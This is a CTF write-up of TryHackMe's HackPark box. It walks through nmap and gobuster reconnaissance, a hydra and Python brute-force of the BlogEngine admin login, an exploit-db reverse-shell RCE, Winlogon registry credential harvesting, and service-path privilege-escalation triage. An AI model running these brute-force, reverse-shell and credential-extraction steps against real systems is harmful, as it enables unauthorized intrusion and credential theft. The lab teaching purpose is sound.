
HackPark – TryHackMe – Manual Writeup


February 21, 2021


This machine will cover brute-forcing account credentials & handling public exploits. Here’s a link to the box.



Nmap scan

As usual, we’ll start with a Nmap scan.

  ┌──(kali㉿kali)-[~]
  └─$ export IP=
  ┌──(kali㉿kali)-[~]
  └─$ nmap -A -p- -v -Pn $IP

PORT     STATE SERVICE            VERSION
80/tcp   open  http               Microsoft IIS httpd 8.5
| http-methods:
|   Supported Methods: GET HEAD OPTIONS TRACE POST
|_  Potentially risky methods: TRACE
| http-robots.txt: 6 disallowed entries
| /Account/*.* /search /search.aspx /error404.aspx
|_/archive /archive.aspx
|_http-server-header: Microsoft-IIS/8.5
|_http-title: hackpark | hackpark amusements
3389/tcp open  ssl/ms-wbt-server?
| ssl-cert: Subject: commonName=hackpark
| Issuer: commonName=hackpark
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2020-10-01T21:12:23
| Not valid after:  2021-04-02T21:12:23
| MD5:   3032 2fb5 4e45 55fa e4d8 a136 f99f 86d3
|_SHA-1: e191 17b5 7329 905e 23e3 93ca d5b1 fbac a510 663b
|_ssl-date: 2021-02-09T08:23:14+00:00; -1s from scanner time.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

We have an IIS 8.5 web server on port 80 & RDP on port 3389. Note that robots.txt already disallows /Account/*.*, which points at a login area. While we inspect the website, let's brute-force for other interesting directories in the background.


Gobuster directory brute-forcing

  ┌──(kali㉿kali)-[~]
  └─$ gobuster dir -u $IP/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -e -r

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Follow Redir:   true
[+] Expanded:       true
[+] Timeout:        10s
===============================================================
2021/02/09 11:14:40 Starting gobuster
===============================================================
(Status: 200)
(Status: 200)
(Status: 200)
(Status: 200)
(Status: 403)
(Status: 200)
(Status: 200)
(Status: 200)
(Status: 200)

Among the gobuster results we find the admin login page. Inspecting the form element shows that the login is submitted as a POST request to the web server.

The login form's URL (/Account/login.aspx?ReturnURL=/admin/) points at an /admin/ area, so admin is the obvious username to try first. Now that we know the request type and have the URL of the login form, we can start brute-forcing the account.



Hydra account brute-forcing

1. Go to the website’s login page and try to login with random credentials.
2. Press “F12” or open “Toggle Tools” in Firefox.
3. Select the “Network” tab.
4. Make an attempt to login with random credentials.
5. Find & select the “POST” request under the “Method” column.
6. Copy the URL starting from “/Account/login” and paste it somewhere to build your command:

7. On the right tab, press on “Request“, scroll all the way down and copy the contents of “Request payload“, and append to the previous link separated by a colon ( : )

8. Replace your typed username & password with ^USER^ & ^PASS^
9. Append “:Login failed” to your command at the end.
10. Result:

┌──(kali㉿kali)-[~]
└─$ hydra -l admin -P /usr/share/wordlists/rockyou.txt -vV $IP http-post-form '/Account/login.aspx?ReturnURL=/admin/:__VIEWSTATE=Ah9VhN0B9RYiuDF6%2BMvlcOfR2OZ%2BcVvkr8LcnJfzMeJe0OsCPo4OMJqfrYasix92wNYHbqm3cgxMec8Z3h%2BBtn71HLVzu495K9ySQE%2BaR5NaEV9vvjt%2FBoz6fXaTTlxQanuQfR%2BZ2DNwqBdqlUfO8vlAE3NKBLb3pMibwwXIuzcifowsfWzKWO15KVeFasS1n6EPMAB33j%2Fc8mcC1xnuzXx4nXB6pMHqc8C7Ka%2FisZdEflgRP%2BG3h8HfycDEoQfd3JXwKSBx6wTeUbSWfJ%2FiRo33Wo6LKwXzIbt%2FVTx8KiWtMV4nKZ2uJ6UcDNcYj6zh5gqaKJYVe7nrldsqKahaN76%2FlEkbKBpHF3aX4%2Bebd9VP4REL&__EVENTVALIDATION=kPO8UUfP8U3ljY712E60qDNGtShCmu43R2e%2B0HQtYgVX%2B5p8S6py0jOleecXbbrYF6%2BysanDe3AFCGrRdbjRSrETb2AzXWJW%2BOzx5muLNpEaphKyLRO%2FIuplxczYtgZDHQ14RpBckwusfOI4Bg%2F4h5AjHQ769OAAq1pJvXMoY%2FrkZlbc&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed'

This string has three parts divided by colons:
path to the login form page : request body : error message indicating failure

Hydra treats any response that does not contain the failure string as a successful login, so the string must be one that appears only on a failed attempt; an error page or a lockout message that lacks it would otherwise show up as a "valid" password.
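The same attack written out in Python, as an added example that is not part of the original writeup. It sends exactly the body the hydra command above sends (ASP.NET hidden fields plus the ctl00$MainContent$LoginUser$* inputs) and decides success the same way, by the absence of "Login failed". Because there is no box to talk to here, the script also starts a constructed mock of BlogEngine's /Account/login.aspx on localhost; its credentials, its viewstate handling and its response texts are made up for the demo and do not come from the real application. Unlike the hydra one-liner, it re-fetches __VIEWSTATE / __EVENTVALIDATION before every attempt, so it does not depend on a captured token staying valid.

```python
import re
import secrets
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed mock target: a stand-in for BlogEngine's /Account/login.aspx.
# The credentials are invented for the demo, not the box's.
MOCK_USER = "admin"
MOCK_PASS = "monkey"
USER_FIELD = "ctl00$MainContent$LoginUser$UserName"
PASS_FIELD = "ctl00$MainContent$LoginUser$Password"
BUTTON_FIELD = "ctl00$MainContent$LoginUser$LoginButton"
LOGIN_PATH = "/Account/login.aspx?ReturnURL=/admin/"
FAIL_MARKER = "Login failed"

_issued_viewstates = set()


class MockLogin(BaseHTTPRequestHandler):
    """Serves a WebForms-style login form and checks POSTed credentials."""

    def _send(self, body):
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.end_headers()
        self.wfile.write(body)

    def do_GET(self):
        vs = secrets.token_urlsafe(24)
        _issued_viewstates.add(vs)
        self._send((
            f'<form method="post"><input type="hidden" name="__VIEWSTATE" value="{vs}">'
            f'<input type="hidden" name="__EVENTVALIDATION" value="{vs}ev">'
            f'<input name="{USER_FIELD}"><input name="{PASS_FIELD}" type="password"></form>'
        ).encode())

    def do_POST(self):
        length = int(self.headers.get("Content-Length", 0))
        fields = urllib.parse.parse_qs(self.rfile.read(length).decode())
        get = lambda key: fields.get(key, [""])[0]
        if get("__VIEWSTATE") not in _issued_viewstates:
            # WebForms rejects a bad __VIEWSTATE before it looks at the credentials;
            # note this page does NOT contain the failure marker.
            self._send(b"Validation of viewstate MAC failed")
        elif get(USER_FIELD) == MOCK_USER and get(PASS_FIELD) == MOCK_PASS:
            self._send(b"Welcome to the admin area")
        else:
            self._send(FAIL_MARKER.encode())

    def log_message(self, *args):
        pass  # keep the demo quiet


HIDDEN_RE = re.compile(r'name="(__VIEWSTATE|__EVENTVALIDATION)" value="([^"]*)"')


def fetch_form_tokens(base_url):
    """GET the login page and return its hidden WebForms fields as a dict."""
    with urllib.request.urlopen(base_url + LOGIN_PATH) as resp:
        html = resp.read().decode()
    return dict(HIDDEN_RE.findall(html))


def try_login(base_url, username, password):
    """One attempt with the same body hydra sends; True unless the page says it failed."""
    body = urllib.parse.urlencode({
        **fetch_form_tokens(base_url),
        USER_FIELD: username,
        PASS_FIELD: password,
        BUTTON_FIELD: "Log in",
    }).encode()
    req = urllib.request.Request(base_url + LOGIN_PATH, data=body, method="POST")
    with urllib.request.urlopen(req) as resp:
        return FAIL_MARKER not in resp.read().decode()


def brute_force(base_url, username, wordlist):
    """Return (password, attempts) for the first hit, or (None, attempts) if none."""
    for attempts, candidate in enumerate(wordlist, 1):
        if try_login(base_url, username, candidate):
            return candidate, attempts
    return None, len(wordlist)


def start_mock_server():
    """Start the constructed mock target on a free localhost port."""
    srv = HTTPServer(("127.0.0.1", 0), MockLogin)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


if __name__ == "__main__":
    server = start_mock_server()
    target = f"http://127.0.0.1:{server.server_port}"
    # Constructed mini wordlist; against the box this would be rockyou.txt read line by line.
    print(brute_force(target, "admin", ["123456", "password", "monkey", "letmein"]))
    server.shutdown()
```

The mock's "Validation of viewstate MAC failed" branch is there to show the weak spot of failure-string matching: that page does not contain "Login failed", so a tool that reuses a stale token and only looks for the failure string would report a false positive. Against a real target, confirm any hit by logging in manually.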



After logging in as admin, we find the BlogEngine version to be & search for an exploit:

  ┌──(kali㉿kali)-[~]
  └─$ searchsploit blogengine 3
---------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                    |  Path
---------------------------------------------------------------------------------- ---------------------------------
BlogEngine 3.3 - 'syndication.axd' XML External Entity Injection                  | xml/webapps/48422.txt
BlogEngine 3.3 - XML External Entity Injection                                    | windows/webapps/46106.txt
BlogEngine 3.3.8 - 'Content' Stored XSS                                           | aspx/webapps/48999.txt
BlogEngine.NET 1.4 - 'search.aspx' Cross-Site Scripting                           | asp/webapps/32874.txt
BlogEngine.NET 1.6 - Directory Traversal / Information Disclosure                 | asp/webapps/35168.txt
BlogEngine.NET 3.3.6 - Directory Traversal / Remote Code Execution                | aspx/webapps/46353.cs
BlogEngine.NET 3.3.6/3.3.7 - 'dirPath' Directory Traversal / Remote Code Executio | aspx/webapps/
BlogEngine.NET 3.3.6/3.3.7 - 'path' Directory Traversal                           | aspx/webapps/
BlogEngine.NET 3.3.6/3.3.7 - 'theme Cookie' Directory Traversal / Remote Code Exe | aspx/webapps/
BlogEngine.NET 3.3.6/3.3.7 - XML External Entity Injection                        | aspx/webapps/
---------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

Copy the exploit locally, change the IP & port in it to those of your listener, & start listening on the chosen port.

  ┌──(kali㉿kali)-[~]
  └─$ cp /usr/share/exploitdb/exploits/aspx/webapps/46353.cs ./PostView.ascx
  ┌──(kali㉿kali)-[~]
  └─$ gedit PostView.ascx
  ┌──(kali㉿kali)-[~]
  └─$ sudo nc -nlvp 443

According to the exploit description, we need to do the following:
1. Navigate to Content
2. Posts
3. New
4. Upload Exploit (name must be PostView.ascx)
5. Publish
6. Visit http://TARGET_IP/?theme=../../App_Data/files to get a shell

listening on [any] 443 ...
connect to [x.x.x.x] from (UNKNOWN) [] 50120
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>whoami
iis apppool\blog



Privilege Escalation

Systeminfo to get an overview

Let’s see the machine’s specs:

> systeminfo
c:\windows\system32\inetsrv>systeminfo

Host Name:                 HACKPARK
OS Name:                   Microsoft Windows Server 2012 R2 Standard
OS Version:                6.3.9600 N/A Build 9600
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Server
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
Registered Organization:
Product ID:                00252-70000-00000-AA886
Original Install Date:     8/3/2019, 10:43:23 AM
System Boot Time:          2/9/2021, 3:19:24 AM
System Manufacturer:       Xen
System Model:              HVM domU
System Type:               x64-based PC
...



Whoami privileges check

> whoami /priv
c:\windows\system32\inetsrv>whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

Windows uses access tokens to decide what an account may do. A token is attached to a process when the user logs on or is otherwise authenticated, and it carries the privileges listed above.

There are two types of access tokens:

  • primary access tokens: those associated with a user account, generated on logon and attached to every process that account starts
  • impersonation tokens: these let a process (or a thread in it) act with the security context of another user, typically a client that has authenticated to a service

SeImpersonatePrivilege is enabled for this application pool account, which is the precondition for token impersonation attacks; we could use that to reach SYSTEM, but first let's look for something simpler.

Winlogon credentials

Let’s check the registry for User Autologon / Winlogon credentials:

> reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"
...
    LastUsedUsername    REG_SZ       administrator
    AutoAdminLogon      REG_DWORD    0x1
    DefaultUserName     REG_SZ       administrator
    DefaultPassword     REG_SZ       4q6[redacted]Fdxs

It looks like we found some admin credentials; let’s use the open RDP port to connect to the machine.

> xfreerdp /dynamic-resolution +clipboard /cert:ignore /v:$IP /u:administrator /p:'4q6X[redacted]dxs'

That gives us the flag by an unintended route. Let's continue with the intended path and look at another weakness this box has.


Unquoted Service Paths

Let’s search for unquoted service paths:

> wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

AWS Lite Guest Agent      AWSLiteAgent      C:\Program Files\Amazon\XenTools\LiteAgent.exe  Auto
System Scheduler Service  WindowsScheduler  C:\PROGRA~2\SYSTEM~1\WService.exe               Auto

Let’s query the service name for more info.

> sc qc WindowsScheduler

Note that the WindowsScheduler path is written with 8.3 short names (PROGRA~2, SYSTEM~1), so it contains no spaces and is not an unquoted-path hijack; the weakness is the service's own folder. Check the log files in the System Scheduler folder for the binary that is run automatically. Replacing that Message.exe with a generated reverse-shell executable gives an admin shell as an alternative route.
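The two checks this section performs, unquoted-path hijack candidates and a look at the binary's directory, as an added Python example that is not part of the original writeup. It parses a constructed copy of the wmic output above (the first two rows mirror the box's, the remaining rows are invented to exercise the filters), applies the same filters as the findstr chain (auto-start, outside C:\Windows, unquoted), and for each hit lists the paths Windows would try before the real image plus the directory the image lives in. The writability check uses os.access on the local filesystem and returns None when the directory does not exist, which is what you get when running this off-box.

```python
import ntpath
import os
import re

# Constructed sample of `wmic service get name,displayname,pathname,startmode`.
# The AWSLiteAgent and WindowsScheduler rows mirror the box; the rest are made up.
WMIC_OUTPUT = r"""
DisplayName               Name              PathName                                            StartMode
AWS Lite Guest Agent      AWSLiteAgent      C:\Program Files\Amazon\XenTools\LiteAgent.exe      Auto
System Scheduler Service  WindowsScheduler  C:\PROGRA~2\SYSTEM~1\WService.exe                   Auto
Vendor Updater            VendorUpd         "C:\Program Files\Vendor Tool\upd.exe" -svc         Auto
Print Spooler             Spooler           C:\Windows\System32\spoolsv.exe                     Auto
Telemetry Helper          TelemHelper       C:\Program Files\Telemetry Co\helper.exe --quiet    Manual
"""

# wmic pads columns with runs of spaces; values themselves only contain single spaces.
ROW_RE = re.compile(
    r"^(?P<display>.+?)\s{2,}(?P<name>\S+)\s{2,}(?P<path>.+?)\s{2,}(?P<start>Auto|Manual|Disabled)\s*$"
)
EXE_RE = re.compile(r"(.+?\.exe)", re.IGNORECASE)


def parse_wmic(text):
    """Return one dict per service row; the header row does not match and is skipped."""
    return [m.groupdict() for m in (ROW_RE.match(l.rstrip()) for l in text.splitlines()) if m]


def image_path(pathname):
    """Split a service PathName into (executable path, was_quoted)."""
    pathname = pathname.strip()
    if pathname.startswith('"'):
        return pathname[1:pathname.index('"', 1)], True
    # Unquoted: Windows cannot tell arguments from the path either; stop at the first .exe.
    m = EXE_RE.match(pathname)
    return (m.group(1) if m else pathname.split(" ")[0]), False


def hijack_candidates(pathname):
    # For an unquoted C:\Program Files\A B\x.exe, CreateProcess first tries
    # C:\Program.exe and then C:\Program Files\A.exe before the real image.
    exe, quoted = image_path(pathname)
    if quoted:
        return []
    return [exe[:i] + ".exe" for i, ch in enumerate(exe) if ch == " "]


def dir_writable(directory):
    """True/False for an existing directory, None if it is absent (e.g. when run off-box)."""
    if not os.path.isdir(directory):
        return None
    return os.access(directory, os.W_OK)


def triage(text):
    # Same filter as the findstr chain: auto-start, outside C:\Windows, not quoted.
    findings = []
    for row in parse_wmic(text):
        exe, quoted = image_path(row["path"])
        if row["start"] != "Auto" or quoted or exe.lower().startswith("c:\\windows\\"):
            continue
        binary_dir = ntpath.dirname(exe)
        findings.append({
            "service": row["name"],
            "exe": exe,
            "candidates": hijack_candidates(row["path"]),  # non-empty => unquoted-path hijack
            "binary_dir": binary_dir,
            "dir_writable": dir_writable(binary_dir),      # writable => swap the binary instead
        })
    return findings


if __name__ == "__main__":
    for finding in triage(WMIC_OUTPUT):
        print(finding)
```

On the box's two rows this reports C:\Program.exe as the only hijack candidate for AWSLiteAgent and none for WindowsScheduler, whose short-name path has no spaces; for the latter the interesting field is binary_dir, which is where the Message.exe swap described above happens.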

Author bio

Hi there, my name is Aydan, and I share exciting information about cyber security and ethical hacking, a.k.a pen-testing.
